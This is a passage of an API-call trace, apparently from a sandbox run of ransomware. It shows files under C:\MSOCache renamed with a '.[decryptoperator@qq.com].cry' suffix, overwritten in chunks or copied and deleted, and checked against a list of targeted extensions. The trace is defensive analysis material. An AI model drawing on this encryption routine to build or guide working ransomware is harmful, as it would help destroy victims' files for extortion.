lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.626] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.626] WriteFile (in: hFile=0x1c4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0042.639] SetEndOfFile (hFile=0x1c4) returned 1 [0042.640] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0042.640] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.640] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.640] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.640] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.641] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.641] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.642] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0042.642] CloseHandle (hObject=0x1c4) returned 1 [0044.517] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0044.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0044.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0044.518] lstrlenW (lpString=".doc") returned 4 [0044.518] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.518] lstrlenW (lpString=".docx") returned 5 [0044.518] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0044.518] lstrlenW (lpString=".pdf") returned 4 [0044.518] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.518] lstrlenW (lpString=".xls") returned 4 [0044.518] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.518] lstrlenW (lpString=".xlsx") returned 5 [0044.518] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0044.518] lstrlenW (lpString=".ppt") returned 4 [0044.518] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0044.518] lstrlenW (lpString=".zip") returned 4 [0044.518] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.518] lstrlenW (lpString=".rar") returned 4 [0044.518] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.518] lstrlenW (lpString=".bz2") returned 4 [0044.518] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.518] lstrlenW (lpString=".7z") returned 3 [0044.518] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0044.518] lstrlenW (lpString=".dbf") returned 4 [0044.518] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0044.518] lstrlenW (lpString=".1cd") returned 4 [0044.518] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0044.518] lstrlenW (lpString=".jpg") returned 4 [0044.518] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0044.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0044.518] lstrlenW (lpString=".doc") returned 4 [0044.518] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.518] lstrlenW (lpString=".docx") returned 5 [0044.518] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0044.519] lstrlenW (lpString=".pdf") returned 4 [0044.519] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.519] lstrlenW (lpString=".xls") returned 4 [0044.519] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.519] lstrlenW (lpString=".xlsx") returned 5 [0044.519] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0044.519] lstrlenW (lpString=".ppt") returned 4 [0044.519] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.519] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0044.519] lstrlenW (lpString=".zip") returned 4 [0044.519] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.519] lstrlenW (lpString=".rar") returned 4 [0044.519] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.519] lstrlenW (lpString=".bz2") returned 4 [0044.519] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.519] lstrlenW (lpString=".7z") returned 3 [0044.519] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.519] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0044.519] lstrlenW (lpString=".dbf") returned 4 [0044.519] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.519] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0044.519] lstrlenW (lpString=".1cd") returned 4 [0044.519] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.519] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0044.519] lstrlenW (lpString=".jpg") returned 4 [0044.519] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.519] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0044.519] lstrlenW (lpString="GrooveMUI.msi") returned 13 [0044.519] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.520] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=2507776) returned 1 [0044.520] CloseHandle (hObject=0x1c4) returned 1 [0044.520] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi")) returned 0x2020 [0044.520] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.520] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0044.520] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.520] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.521] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.521] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.625] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.625] ReadFile (in: hFile=0x1c4, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.655] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.655] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.655] ReadFile (in: hFile=0x1c4, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.871] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.871] WriteFile (in: hFile=0x1c4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0044.902] SetEndOfFile (hFile=0x1c4) returned 1 [0044.902] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0044.919] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.919] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.920] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.032] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.039] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.039] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.041] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0045.042] CloseHandle (hObject=0x1c4) returned 1 [0045.042] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0045.042] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0045.042] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0045.042] lstrlenW (lpString=".doc") returned 4 [0045.086] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.096] lstrlenW (lpString=".docx") returned 5 [0045.096] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0045.096] lstrlenW (lpString=".pdf") returned 4 [0045.096] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.096] lstrlenW (lpString=".xls") returned 4 [0045.096] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.096] lstrlenW (lpString=".xlsx") returned 5 [0045.096] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0045.096] lstrlenW (lpString=".ppt") returned 4 [0045.096] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.096] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0045.096] lstrlenW (lpString=".zip") returned 4 [0045.096] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.096] lstrlenW (lpString=".rar") returned 4 [0045.096] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.096] lstrlenW (lpString=".bz2") returned 4 [0045.096] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.096] lstrlenW (lpString=".7z") returned 3 [0045.096] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.097] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0045.097] lstrlenW (lpString=".dbf") returned 4 [0045.097] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.097] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0045.097] lstrlenW (lpString=".1cd") returned 4 [0045.097] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.097] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0045.097] lstrlenW (lpString=".jpg") returned 4 [0045.097] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.097] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0045.097] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0045.097] lstrlenW (lpString=".doc") returned 4 [0045.097] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.097] lstrlenW (lpString=".docx") returned 5 [0045.097] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0045.097] lstrlenW (lpString=".pdf") returned 4 [0045.097] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.097] lstrlenW (lpString=".xls") returned 4 [0045.097] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.097] lstrlenW (lpString=".xlsx") returned 5 [0045.097] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0045.097] lstrlenW (lpString=".ppt") returned 4 [0045.097] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.097] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0045.097] lstrlenW (lpString=".zip") returned 4 [0045.097] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.097] lstrlenW (lpString=".rar") returned 4 [0045.097] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.097] lstrlenW (lpString=".bz2") returned 4 [0045.097] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.097] lstrlenW (lpString=".7z") returned 3 [0045.097] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.097] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0045.098] lstrlenW (lpString=".dbf") returned 4 [0045.098] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.098] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0045.098] lstrlenW (lpString=".1cd") returned 4 [0045.098] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.098] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0045.098] lstrlenW (lpString=".jpg") returned 4 [0045.098] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.098] lstrcmpiW (lpString1=".exe", lpString2=".cry") returned 1 [0045.098] lstrlenW (lpString="dwtrig20.exe") returned 12 [0045.098] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0045.751] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=519584) returned 1 [0045.751] CloseHandle (hObject=0x1c0) returned 1 [0045.751] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 0x2020 [0045.751] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.751] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0045.751] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.751] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.752] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0045.752] GetLastError () returned 0x0 [0045.752] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x7eda0, lpOverlapped=0x0) returned 1 [0046.602] WriteFile (in: hFile=0x200, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x7edb0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x7edb0, lpOverlapped=0x0) returned 1 [0046.612] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.612] WriteFile (in: hFile=0x200, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.613] SetEndOfFile (hFile=0x200) returned 1 [0046.613] CloseHandle (hObject=0x200) returned 1 [0046.613] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.613] SetEndOfFile (hFile=0x1c0) returned 1 [0046.616] CloseHandle (hObject=0x1c0) returned 1 [0046.616] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0046.617] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 1 [0046.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0046.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0046.617] lstrlenW (lpString=".doc") returned 4 [0046.617] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0046.617] lstrlenW (lpString=".docx") returned 5 [0046.617] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0046.617] lstrlenW (lpString=".pdf") returned 4 [0046.617] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0046.617] lstrlenW (lpString=".xls") returned 4 [0046.617] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0046.617] lstrlenW (lpString=".xlsx") returned 5 [0046.617] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0046.617] lstrlenW (lpString=".ppt") returned 4 [0046.617] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0046.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0046.617] lstrlenW (lpString=".zip") returned 4 [0046.617] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0046.617] lstrlenW (lpString=".rar") returned 4 [0046.617] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0046.617] lstrlenW (lpString=".bz2") returned 4 [0046.617] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0046.617] lstrlenW (lpString=".7z") returned 3 [0046.617] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0046.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0046.617] lstrlenW (lpString=".dbf") returned 4 [0046.617] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0046.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0046.618] lstrlenW (lpString=".1cd") returned 4 [0046.618] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0046.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0046.618] lstrlenW (lpString=".jpg") returned 4 [0046.618] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0046.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0046.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0046.618] lstrlenW (lpString=".doc") returned 4 [0046.618] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0046.618] lstrlenW (lpString=".docx") returned 5 [0046.618] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0046.618] lstrlenW (lpString=".pdf") returned 4 [0046.618] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0046.618] lstrlenW (lpString=".xls") returned 4 [0046.618] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0046.618] lstrlenW (lpString=".xlsx") returned 5 [0046.618] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0046.618] lstrlenW (lpString=".ppt") returned 4 [0046.618] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0046.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0046.618] lstrlenW (lpString=".zip") returned 4 [0046.618] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0046.618] lstrlenW (lpString=".rar") returned 4 [0046.618] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0046.618] lstrlenW (lpString=".bz2") returned 4 [0046.618] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0046.618] lstrlenW (lpString=".7z") returned 3 [0046.618] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0046.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0046.618] lstrlenW (lpString=".dbf") returned 4 